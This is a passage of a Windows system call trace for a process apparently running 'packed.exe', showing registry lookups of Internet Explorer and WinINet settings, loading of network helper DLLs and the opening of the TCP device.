 02041   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02042   748   NtOpenKey  (0x1, {24, 232, 0x40, 0, 0,  (0x1, {24, 232, 0x40, 0, 0, "FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02043   748   NtClose  (232, ... ) == 0x0
 02044   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02045   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02046   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 232, ) }, ... 232, ) == 0x0
 02047   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02048   748   NtOpenKey  (0x1, {24, 232, 0x40, 0, 0,  (0x1, {24, 232, 0x40, 0, 0, "FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK"}, ... 236, ) }, ... 236, ) == 0x0
 02049   748   NtQueryValueKey  (236,  (236, "packed.exe", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02050   748   NtQueryValueKey  (236,  (236, "*", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02051   748   NtClose  (236, ... ) == 0x0
 02052   748   NtClose  (232, ... ) == 0x0
 02053   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02054   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02055   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 232, ) }, ... 232, ) == 0x0
 02056   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02057   748   NtOpenKey  (0x1, {24, 232, 0x40, 0, 0,  (0x1, {24, 232, 0x40, 0, 0, "FEATURE_DIGEST_NO_EXTRAS_IN_URI"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02058   748   NtClose  (232, ... ) == 0x0
 02059   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02060   748   NtQueryValueKey  (232,  (232, "DisableCachingOfSSLPages", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "DisableCachingOfSSLPages", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02061   748   NtClose  (232, ... ) == 0x0
 02062   748   NtQueryValueKey  (156,  (156, "PerUserCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02063   748   NtQueryValueKey  (156,  (156, "LeashLegacyCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02064   748   NtQueryValueKey  (156,  (156, "DisableNT4RasCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02065   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02066   748   NtQueryValueKey  (232,  (232, "DialupUseLanSettings", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02067   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02068   748   NtQueryValueKey  (236,  (236, "DialupUseLanSettings", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02069   748   NtClose  (232, ... ) == 0x0
 02070   748   NtClose  (236, ... ) == 0x0
 02071   748   NtQueryValueKey  (156,  (156, "SendExtraCRLF", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02072   748   NtQueryValueKey  (156,  (156, "BypassFtpTimeCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02073   748   NtQueryValueKey  (156,  (156, "ReleaseSocketDuringAuth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02074   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02075   748   NtQueryValueKey  (236,  (236, "ReleaseSocketDuring401Auth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02076   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02077   748   NtQueryValueKey  (232,  (232, "ReleaseSocketDuring401Auth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02078   748   NtClose  (236, ... ) == 0x0
 02079   748   NtClose  (232, ... ) == 0x0
 02080   748   NtQueryValueKey  (156,  (156, "WpadSearchAllDomains", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02081   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02082   748   NtQueryValueKey  (232,  (232, "DisableLegacyPreAuthAsServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02083   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02084   748   NtQueryValueKey  (236,  (236, "DisableLegacyPreAuthAsServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02085   748   NtClose  (232, ... ) == 0x0
 02086   748   NtClose  (236, ... ) == 0x0
 02087   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02088   748   NtQueryValueKey  (236,  (236, "BypassHTTPNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02089   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02090   748   NtQueryValueKey  (232,  (232, "BypassHTTPNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02091   748   NtClose  (236, ... ) == 0x0
 02092   748   NtClose  (232, ... ) == 0x0
 02093   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02094   748   NtQueryValueKey  (232,  (232, "BypassSSLNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02095   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02096   748   NtQueryValueKey  (236,  (236, "BypassSSLNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02097   748   NtClose  (232, ... ) == 0x0
 02098   748   NtClose  (236, ... ) == 0x0
 02099   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02100   748   NtQueryValueKey  (236,  (236, "EnableHttpTrace", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02101   748   NtClose  (236, ... ) == 0x0
 02102   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02103   748   NtQueryValueKey  (236,  (236, "NoCheckAutodialOverRide", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02104   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02105   748   NtQueryValueKey  (232,  (232, "NoCheckAutodialOverRide", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02106   748   NtClose  (236, ... ) == 0x0
 02107   748   NtClose  (232, ... ) == 0x0
 02108   748   NtQueryValueKey  (156,  (156, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02109   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02110   748   NtQueryValueKey  (232,  (232, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02111   748   NtClose  (232, ... ) == 0x0
 02112   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 232, ) }, ... 232, ) == 0x0
 02113   748   NtQueryValueKey  (232,  (232, "ShareCredsWithWinHttp", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02114   748   NtClose  (232, ... ) == 0x0
 02115   748   NtQueryValueKey  (156,  (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 02116   748   NtQueryValueKey  (156,  (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 02117   748   NtQueryValueKey  (156,  (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 02118   748   NtQueryValueKey  (156,  (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (156, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0
 02119   748   NtQueryValueKey  (156,  (156, "HeaderExclusionListForCache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02120   748   NtQueryValueKey  (156,  (156, "DnsCacheEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02121   748   NtQueryValueKey  (156,  (156, "DnsCacheEntries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02122   748   NtQueryValueKey  (156,  (156, "DnsCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02123   748   NtQueryValueKey  (156,  (156, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (156, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02124   748   NtQueryValueKey  (156,  (156, "WarnAlwaysOnPost", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02125   748   NtQueryValueKey  (156,  (156, "WarnOnZoneCrossing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "WarnOnZoneCrossing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02126   748   NtQueryValueKey  (156,  (156, "WarnOnBadCertSending", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02127   748   NtQueryValueKey  (156,  (156, "WarnOnBadCertRecving", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02128   748   NtQueryValueKey  (156,  (156, "WarnOnPostRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02129   748   NtQueryValueKey  (156,  (156, "AlwaysDrainOnRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02130   748   NtQueryValueKey  (156,  (156, "WarnOnHTTPSToHTTPRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02131   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetStartupMutex"}, ... 232, ) }, ... 232, ) == 0x0
 02132   748   NtCreateEvent  (0x1f0003, 0x0, 1, 1, ... 236, ) == 0x0
 02133   748   NtQueryValueKey  (156,  (156, "GlobalUserOffline", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "GlobalUserOffline", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 02134   748   NtWaitForSingleObject  (188, 0, 0x0, ... ) == 0x0
 02135   748   NtReleaseMutant  (188, ... 0x0, ) == 0x0
 02136   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetConnectionMutex"}, ... 240, ) }, ... 240, ) == 0x0
 02137   748   NtOpenMutant  (0x100000, {24, 48, 0x0, 0, 0,  (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetProxyRegistryMutex"}, ... 244, ) }, ... 244, ) == 0x0
 02138   748   NtCreateEvent  (0x1f0003, 0x0, 0, 1, ... 248, ) == 0x0
 02139   748   NtQueryValueKey  (156,  (156, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "EnableAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02140   748   NtQueryValueKey  (156,  (156, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "NoNetAutodial", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 02141   748   NtCreateEvent  (0x1f0003, 0x0, 1, 0, ... 252, ) == 0x0
 02142   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 256, ) }, ... 256, ) == 0x0
 02143   748   NtQueryValueKey  (256,  (256, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (256, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0
 02144   748   NtQueryValueKey  (256,  (256, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (256, "UrlEncoding", Partial, 144, ... TitleIdx=0, Type=1, Data="0\0x\00\00\00\00\00\00\00\00\0\0\0"}, 34, ) }, 34, ) == 0x0
 02145   748   NtClose  (256, ... ) == 0x0
 02146   748   NtQueryValueKey  (156,  (156, "TruncateFileName", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02147   748   NtQueryValueKey  (156,  (156, "BadProxyExpiresTime", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02148   748   NtAllocateVirtualMemory  (-1, 1396736, 0, 4096, 4096, 4, ... 1396736, 4096, ) == 0x0
 02149   748   NtCreateEvent  (0x1f0003, 0x0, 1, 1, ... 256, ) == 0x0
 02150   748   NtWaitForSingleObject  (256, 0, 0x0, ... ) == 0x0
 02151   748   NtClearEvent  (256, ... ) == 0x0
 02152   748   NtSetEvent  (256, ... 0x0, ) == 0x0
 02153   748   NtClearEvent  (236, ... ) == 0x0
 02154   748   NtSetEvent  (236, ... 0x0, ) == 0x0
 02155   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "icmp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02156   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\icmp.dll"}, 1240360, ... ) }, 1240360, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02157   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\icmp.dll"}, 1240360, ... ) }, 1240360, ... ) == 0x0
 02158   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\icmp.dll"}, 5, 96, ... 260, {status=0x0, info=1}, ) }, 5, 96, ... 260, {status=0x0, info=1}, ) == 0x0
 02159   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 260, ... 264, ) == 0x0
 02160   748   NtQuerySection  (264, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02161   748   NtClose  (260, ... ) == 0x0
 02162   748   NtMapViewOfSection  (264, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74290000), 0x0, 16384, ) == 0x0
 02163   748   NtClose  (264, ... ) == 0x0
 02164   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "iphlpapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02165   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\iphlpapi.dll"}, 1240816, ... ) }, 1240816, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02166   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\iphlpapi.dll"}, 1240816, ... ) }, 1240816, ... ) == 0x0
 02167   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\iphlpapi.dll"}, 5, 96, ... 264, {status=0x0, info=1}, ) }, 5, 96, ... 264, {status=0x0, info=1}, ) == 0x0
 02168   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 264, ... 260, ) == 0x0
 02169   748   NtQuerySection  (260, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02170   748   NtClose  (264, ... ) == 0x0
 02171   748   NtMapViewOfSection  (260, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76d60000), 0x0, 102400, ) == 0x0
 02172   748   NtClose  (260, ... ) == 0x0
 02173   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02174   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02175   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02176   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02177   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02178   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02179   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02180   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02181   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02182   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02183   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02184   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02185   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02186   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02187   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02188   748   NtProtectVirtualMemory  (-1, (0x76d61000), 500, 4, ... (0x76d61000), 4096, 32, ) == 0x0
 02189   748   NtProtectVirtualMemory  (-1, (0x76d61000), 4096, 32, ... (0x76d61000), 4096, 4, ) == 0x0
 02190   748   NtFlushInstructionCache  (-1, 1993740288, 500, ... ) == 0x0
 02191   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iphlpapi.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02192   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02193   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 17039360, 65536, ) == 0x0
 02194   748   NtAllocateVirtualMemory  (-1, 17039360, 0, 4096, 4096, 4, ... 17039360, 4096, ) == 0x0
 02195   748   NtAllocateVirtualMemory  (-1, 17043456, 0, 8192, 4096, 4, ... 17043456, 8192, ) == 0x0
 02196   748   NtCreateFile  (0x20000000, {24, 0, 0x40, 0, 0,  (0x20000000, {24, 0, 0x40, 0, 0, "\Device\Tcp"}, 0x0, 128, 3, 3, 0, 0, 0, ... 260, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 260, {status=0x0, info=0}, ) == 0x0
 02197   748   NtCreateFile  (0x40000000, {24, 0, 0x40, 0, 0,  (0x40000000, {24, 0, 0x40, 0, 0, "\Device\Tcp"}, 0x0, 128, 3, 3, 0, 0, 0, ... 264, {status=0x0, info=0}, ) }, 0x0, 128, 3, 3, 0, 0, 0, ... 264, {status=0x0, info=0}, ) == 0x0
